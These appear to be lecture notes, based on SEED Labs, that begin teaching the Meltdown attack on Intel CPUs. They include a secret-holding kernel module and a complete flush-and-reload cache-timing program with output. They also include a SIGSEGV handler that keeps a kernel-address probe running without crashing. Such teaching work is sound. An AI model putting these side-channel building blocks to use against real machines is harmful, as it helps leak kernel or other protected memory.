Meltdown is a hardware vulnerability that affected Intel x86 CPUs, IBM POWER
CPUs, and some ARM-based CPUs. It allowed a malicious process to read all
memory, even memory it was not authorized to access.
Meltdown affected a wide range of systems. At the time of disclosure (2018), this
included all devices running any but the most recent and patched versions of
iOS, Linux, macOS, or Windows. Accordingly, many servers and cloud
services were impacted, as well as a potential majority of smart devices and
embedded devices using ARM-based CPUs (mobile devices, smart TVs, printers
and others), including a wide range of networking equipment.
It was disclosed in conjunction with another exploit, Spectre, with which it
shares some characteristics. The Meltdown and Spectre vulnerabilities were
considered "catastrophic" by security analysts. The vulnerabilities were so
severe that security researchers initially believed the reports to be false.
In 2018, Intel reportedly added hardware and firmware mitigations for the
Spectre and Meltdown vulnerabilities to its latest processors.
Over two lectures, we will show how the Meltdown attack works.
Acknowledgements.
The lecture notes are inspired by the SEED
Labs.
Testing environments.
The attack has been tested under the following environments:
- VMware Workstation 15 Player.
- OS: Ubuntu 16.04.1, 64-bit (kernel version: 4.4.0-31-generic).
- CPU: Intel CPU i5-6300U (released in 2015)
Setting the Context: Reading Kernel Memory?
We first create and insert a kernel module. Then, we will create an attack
program that tries to read the secret data.
Creating and inserting a kernel module
First let's check the following code:
// mdown_kernel.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/vmalloc.h>
#include <linux/version.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/uaccess.h>

static char secret[] = "Go Navy!";
static void *buf;

static int mdown_open(struct inode *inode, struct file *file)
{
    return single_open(file, NULL, PDE_DATA(inode));
}

// Reading /proc/secret_data copies the secret inside the kernel only;
// nothing is copied into the user-supplied buffer.
static ssize_t mdown_read(struct file *filp, char *buffer,
                          size_t length, loff_t *offset)
{
    memcpy(buf, &secret, sizeof(secret));
    return sizeof(secret);
}

static const struct file_operations mdown_fops =
{
    .owner = THIS_MODULE,
    .open = mdown_open,
    .read = mdown_read,
    .llseek = seq_lseek,
    .release = single_release,
};

static __init int mdown_init(void)
{
    // print into the kernel message buffer
    printk("secret data address: 0x%p\n", &secret);
    buf = vmalloc(sizeof(secret));
    if (!buf)
        return -ENOMEM;
    proc_create_data("secret_data", 0444, NULL, &mdown_fops, NULL);
    return 0;
}

static __exit void mdown_cleanup(void)
{
    remove_proc_entry("secret_data", NULL);
    vfree(buf); // release the buffer allocated in mdown_init
}

module_init(mdown_init);
module_exit(mdown_cleanup);
MODULE_LICENSE("GPL");
To compile the code, we will create a Makefile as follows:
KVERS = $(shell uname -r)
obj-m += mdown_kernel.o
all:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules
Now, let's compile the code.
~$ make
make -C /lib/modules/4.4.0-31-generic/build M=/home/choi/it432 modules
make[1]: Entering directory '/usr/src/linux-headers-4.4.0-31-generic'
Building modules, stage 2.
MODPOST 1 modules
make[1]: Leaving directory '/usr/src/linux-headers-4.4.0-31-generic'
The build produces the module file mdown_kernel.ko. We can insert
this module into the kernel as follows:
~$ sudo insmod mdown_kernel.ko
Note that mdown_init calls printk, which writes to the kernel message
buffer. We can check its output with the dmesg command.
~$ dmesg | grep secret
[ 400.054528] secret data address: 0xffffffffc0232000
Naive trial that won't work
Let's try to read the data at address 0xffffffffc0232000.
// atk_naive.c
#include <stdio.h>

int main(void)
{
    void *addr;

    printf("address: ");
    if (scanf("%p", &addr) != 1)
        return 1;
    char *p = addr;
    // %p already prints the 0x prefix
    printf("reading address at %p...\n", (void *)p);
    printf("%d %c\n", *p, *p);
    return 0;
}
Let's compile and run the program:
~$ gcc atk_naive.c -o atk_naive
~$ ./atk_naive
address: 0xffffffffc0232000
reading address at 0xffffffffc0232000...
Segmentation fault (core dumped)
As expected, a normal program cannot read any data in the kernel region.
How can a normal program read kernel data? Is this even possible?
The Meltdown attack answers this question affirmatively!
Interesting Puzzle
Consider code that performs the following:
- Prepare an array.
- Read a number (from 0 to 9) from a secret file.
- Change the array based on the number.
- Change the array back to its original state.
In particular, consider the code below.
Can you figure out the secret?
- You can add code.
- Of course, you are not allowed to read the secret file again.
- Of course, you are not allowed to store the number in some other variable.
#include <stdio.h>

int main()
{
    // 1. Prepare an array
    char A[10*4096];
    for(int i=0; i<10; i++)
        A[i*4096] = 1;

    // 2. Read a number from a secret file
    int n;
    FILE* f = fopen("secret.txt", "r");
    fscanf(f, "%d", &n);
    fclose(f);

    // ???? code ????

    // 3. Change the array based on the number
    A[n*4096] = 2;

    // 4. Revert the array state
    A[n*4096] = 1;
    n = -1;

    // ???? code ????
    return 0;
}
Solution to the puzzle
The idea is to use a cache side-channel attack!
What is the side information that the cache leaks?
- A recently accessed item will reside in the cache.
- If you access an item that is in the cache, the access is fast.
- If you access an item that is not in the cache, the access is slower.
So, here is the code we will add:
- Before changing the array, flush the cache for all potential items.
- In the end, do the following:
  - For each item, try accessing it and measure the access time.
The item with the minimum access time will probably be the secret number!
Here is a sample run of the complete solution program, sol_puzzle.c, which is listed after the run.
~$ gcc sol_puzzle.c
~$ ./a.out
Access time for array[0*4096]: 184 CPU cycles
Access time for array[1*4096]: 220 CPU cycles
Access time for array[2*4096]: 194 CPU cycles
Access time for array[3*4096]: 218 CPU cycles
Access time for array[4*4096]: 218 CPU cycles
Access time for array[5*4096]: 212 CPU cycles
Access time for array[6*4096]: 36 CPU cycles
Access time for array[7*4096]: 222 CPU cycles
Access time for array[8*4096]: 194 CPU cycles
Access time for array[9*4096]: 218 CPU cycles
~$ cat secret.txt
6
Item 6 has the minimum access time, which matches the secret number!
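Picking the fastest entry by eye can also be done in code. The following is a minimal sketch, not part of the original solution: the helper name fastest_index is hypothetical, and it assumes the measured cycle counts have already been stored in an array.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: returns the index of the smallest entry in
 * times[0..n-1]. On a tie, the lowest index wins. */
size_t fastest_index(const uint64_t *times, size_t n)
{
    assert(times != NULL && n > 0);
    size_t best = 0;
    for (size_t i = 1; i < n; i++) {
        if (times[i] < times[best])
            best = i;
    }
    return best;
}
```

Called on the ten values from the sample run above (184, 220, 194, 218, 218, 212, 36, 222, 194, 218), it returns 6.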
// sol_puzzle.c
#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>
#include <emmintrin.h> // _mm_clflush
#include <x86intrin.h> // __rdtscp

int main(void)
{
    // 1. Prepare an array
    char A[10*4096];
    for(int i=0; i<10; i++)
        A[i*4096] = 1;

    // 2. Read a number from a secret file
    int n;
    FILE* f = fopen("secret.txt", "r");
    if(f == NULL || fscanf(f, "%d", &n) != 1 || n < 0 || n > 9) {
        fprintf(stderr, "cannot read a number (0 to 9) from secret.txt\n");
        return 1;
    }
    fclose(f);

    // *********** Flush the cache for every element *********
    for(int i=0; i<10; i++)
        _mm_clflush(&A[i*4096]);

    // 3. Change the array based on the number.
    A[n*4096] = 2;

    // 4. Revert the array state
    A[n*4096] = 1;
    n = -1;

    // **** Measure access time for each possibility ****
    volatile char* addr; // volatile: the timed read must really happen
    unsigned int junk;   // __rdtscp expects an unsigned int*
    uint64_t time1, time2;
    for(int i=0; i<10; i++) {
        addr = &A[i*4096];
        time1 = __rdtscp(&junk);
        junk = *addr;
        time2 = __rdtscp(&junk);
        printf("Access time for array[%d*4096]: %" PRIu64 " CPU cycles\n",
               i, time2-time1);
    }
    return 0;
}
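A single timing run can be misleading, because an unrelated access may also land in the cache or the secret's entry may be evicted before it is timed. One way to cope, sketched here under stated assumptions, is to repeat the flush, touch, and measure steps several times and count how often each slot looks like a cache hit. The names record_trial and most_voted and the cutoff HIT_THRESHOLD (80 cycles) are hypothetical choices for illustration; a suitable cutoff depends on the machine.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NUM_SLOTS 10      /* one slot per candidate value, as in A[i*4096] */
#define HIT_THRESHOLD 80  /* assumed cutoff in CPU cycles; tune per machine */

/* Add one vote to every slot whose access time looks like a cache hit. */
void record_trial(const uint64_t times[NUM_SLOTS], int votes[NUM_SLOTS])
{
    assert(times != NULL && votes != NULL);
    for (size_t i = 0; i < NUM_SLOTS; i++) {
        if (times[i] < HIT_THRESHOLD)
            votes[i]++;
    }
}

/* Return the slot with the most votes, or -1 if no slot got a vote. */
int most_voted(const int votes[NUM_SLOTS])
{
    int best = -1;
    int best_votes = 0;
    for (int i = 0; i < NUM_SLOTS; i++) {
        if (votes[i] > best_votes) {
            best_votes = votes[i];
            best = i;
        }
    }
    return best;
}
```

The caller would fill a times array after each measurement loop, pass it to record_trial, and call most_voted once all trials are done. An occasional stray hit in another slot is then outvoted by the slot that is fast in most trials.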
Of course, it is not yet clear how to take advantage of the cache side
channel to read kernel data. But, at least, this is a good direction. We will
revisit this idea and develop it into the actual attack in the next lecture.
Making the Probing Program Avoid Crashing
Another problem that we have to deal with is that our probing program just
dies. This is because the program gets the signal SIGSEGV (segmentation fault
signal). By handling this signal, we can make the program move on without
crashing.
Signal handler and sigaction()
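The sigaction() system call has the prototype
int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact).
The first argument is the signal to be handled, while the second and third
arguments are pointers to a struct sigaction: act describes the new action,
and oldact, if it is not NULL, receives the previous one. It is in the
struct sigaction that we set the handler function and additional
options. Its main members are:
- sa_handler: The function to call when the signal arrives.
- sa_mask: The set of signals to block while the handler runs.
- sa_flags: Flags that modify the behavior. We use SA_NODEFER, which allows the signal to be delivered again even while its own handler is running.
Why do we need to handle the fault repeatedly? Because the access time is a
noisy measure. To get a more accurate estimate, we need to measure the access
time over many iterations. In the code below, we control the number of
iterations with a global variable trial.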
// atk_repeat.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>

int trial = 0;
char* p;

void try(void)
{
    trial++;
    // %p already prints the 0x prefix
    printf("reading address at %p...\n", (void*)p);
    printf("%d %c\n", *p, *p); // this read faults and raises SIGSEGV
}

void catch_segv(int signum)
{
    if( trial < 5)
        try();
    else
        exit(0); // now it's time to end the program
}

int main(void)
{
    void* addr;
    printf("address: ");
    if (scanf("%p", &addr) != 1)
        return 1;
    p = addr;

    struct sigaction action = {0}; // start from a zeroed struct
    sigemptyset(&action.sa_mask);
    action.sa_flags = SA_NODEFER;  // let SIGSEGV arrive again inside the handler
    action.sa_handler = catch_segv;
    sigaction(SIGSEGV, &action, NULL);
    try();
    return 0;
}
To make things simpler, the code uses global variables:
- trial: This keeps track of how many trials have been attempted so far.
- p: The address that the user provides.
The function try() tries to access a kernel region, which always raises a
SIGSEGV signal.
Because of the sigaction call in the main() function, the
SIGSEGV signal is handled by catch_segv(), which calls try() again. The
SA_NODEFER flag lets SIGSEGV be delivered again while catch_segv() is
still running, which this nested retry needs. The procedure repeats
recursively until trial reaches 5, at which point the handler exits the
program.
The sample run is shown below:
~$ ./atk_repeat
address: 0xffffffffc0232000
reading address at 0xffffffffc0232000...
reading address at 0xffffffffc0232000...
reading address at 0xffffffffc0232000...
reading address at 0xffffffffc0232000...
reading address at 0xffffffffc0232000...